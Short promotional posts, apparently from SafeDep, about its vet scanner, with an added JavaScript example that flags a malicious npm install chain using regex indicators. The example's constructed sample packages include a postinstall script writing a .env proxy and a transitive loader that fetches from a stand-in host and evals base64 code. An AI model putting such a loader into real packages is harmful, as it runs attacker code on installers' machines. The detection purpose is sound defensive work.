🚀 Announcing #GitLab CI/CD Component for #vet
➡️ Seamless integration as a CI Component
➡️ Available in GitLab CI Catalog
➡️ Policy as Code (CEL)
➡️ Protect against vulnerable and malicious "code"
👋 Try now
➡️ safedep.io/introducing-gi…
#devops #appsec #opensource #Security
Malware hiding in a fake eslint-config package?😨
This npm package looked harmless until:
🔹Postinstall sets a .env with malicious proxy
🔹Transitive dep fetches payload via env var
🔹Remote server sends & runs base64 JS code
How dynamic analysis caught👉safedep.io/digging-into-d…
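The chain described in the post above, as an added example that is not code from the original post, from vet, or from SafeDep: a small static triage pass over an npm dependency tree that flags each link separately (an install hook, a write to `.env`, an env-var-driven fetch, base64 decode fed to an evaluator) and then checks whether the whole chain is present across the tree. The package names, file contents and indicator regexes are constructed for illustration and are assumptions, not vet's policy or detection logic.

```javascript
// Added example (not code from the original post, nor from vet or SafeDep):
// static triage of an npm dependency tree for the chain the post describes.
// Package names, file contents and the indicator regexes are constructed.

// Each package: { name, manifest: parsed package.json, files: { path: source } }.
const fileMatches = (pkg, re) => Object.values(pkg.files).some((src) => re.test(src));

const INDICATORS = [
  {
    id: 'install-hook', // lifecycle script that runs during `npm install`
    test: (pkg) => ['preinstall', 'install', 'postinstall']
      .some((k) => Boolean(pkg.manifest.scripts && pkg.manifest.scripts[k])),
  },
  {
    id: 'writes-dotenv', // fs.writeFile*('<...>.env', ...)
    test: (pkg) => fileMatches(pkg, /writeFile(?:Sync)?\s*\(\s*['"`][^'"`]*\.env['"`]/),
  },
  {
    id: 'env-driven-fetch', // reads process.env AND makes an outbound request
    test: (pkg) =>
      fileMatches(pkg, /process\.env(?:\.[A-Za-z_]\w*|\[)/) &&
      fileMatches(pkg, /\b(?:https?\.(?:get|request)|fetch|axios\.(?:get|post))\s*\(/),
  },
  {
    id: 'base64-eval', // decodes base64 AND hands the result to an evaluator
    test: (pkg) =>
      fileMatches(pkg, /(?:Buffer\.from\([^)]*['"]base64['"]\s*\)|\batob\s*\()/) &&
      fileMatches(pkg, /\b(?:eval|Function|vm\.runIn(?:This|New)Context)\s*\(/),
  },
];

// Indicators present in one package, in INDICATORS order.
function triagePackage(pkg) {
  return INDICATORS.filter((ind) => ind.test(pkg)).map((ind) => ind.id);
}

// Indicators across the whole tree. The chain is only visible when the direct
// dependency's install hook and the transitive dependency's loader are looked
// at together; reviewing either package alone shows only half of it.
function triageTree(packages) {
  const findings = {};
  for (const pkg of packages) findings[pkg.name] = triagePackage(pkg);
  const seen = new Set(Object.values(findings).flat());
  const chainDetected = INDICATORS.every((ind) => seen.has(ind.id));
  return { findings, chainDetected };
}

// Constructed sample tree mirroring the post's description (names are made up).
const SAMPLE_TREE = [
  {
    name: 'eslint-config-sample', // constructed name, not the real package
    manifest: {
      name: 'eslint-config-sample',
      scripts: { postinstall: 'node setup.js' },
      dependencies: { 'sample-loader': '1.0.0' },
    },
    files: {
      'setup.js': [
        "const fs = require('fs');",
        "fs.writeFileSync('.env', 'PAYLOAD_PROXY=http://proxy.example.invalid:8080\\n');",
      ].join('\n'),
    },
  },
  {
    name: 'sample-loader', // transitive dependency carrying the loader
    manifest: { name: 'sample-loader' },
    files: {
      'index.js': [
        "const https = require('https');",
        'https.get(process.env.PAYLOAD_PROXY, (res) => {',
        "  let body = '';",
        "  res.on('data', (d) => { body += d; });",
        "  res.on('end', () => eval(Buffer.from(body, 'base64').toString()));",
        '});',
      ].join('\n'),
    },
  },
  {
    name: 'sample-util', // benign control package
    manifest: { name: 'sample-util' },
    files: { 'index.js': 'module.exports = (s) => s.trim();' },
  },
];

console.log(JSON.stringify(triageTree(SAMPLE_TREE), null, 2));
```

Regex triage like this is a heuristic and is trivially defeated by string splitting or obfuscation, which is why the post's point about dynamic analysis matters: executing the install hook in a sandbox observes the `.env` write and the outbound fetch regardless of how the source is spelled.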
🔍Not all open source threats are the same.
We often confuse vulnerable libraries with malicious ones, but the difference is critical.
🛠 Vulnerable = unintentional bugs, tracked & patchable
💣Malicious = intentional backdoors, harder to detect, devastating impact
🗳️Should Vet offer built-in policies out-of-the-box?
So far, Vet lets you define what’s risky using CEL. But now we’re exploring defaults like `--policy builtin:critical-set`
Vote & share your thoughts👇
🔗github.com/safedep/vet/di…
#DevSecOps #OSS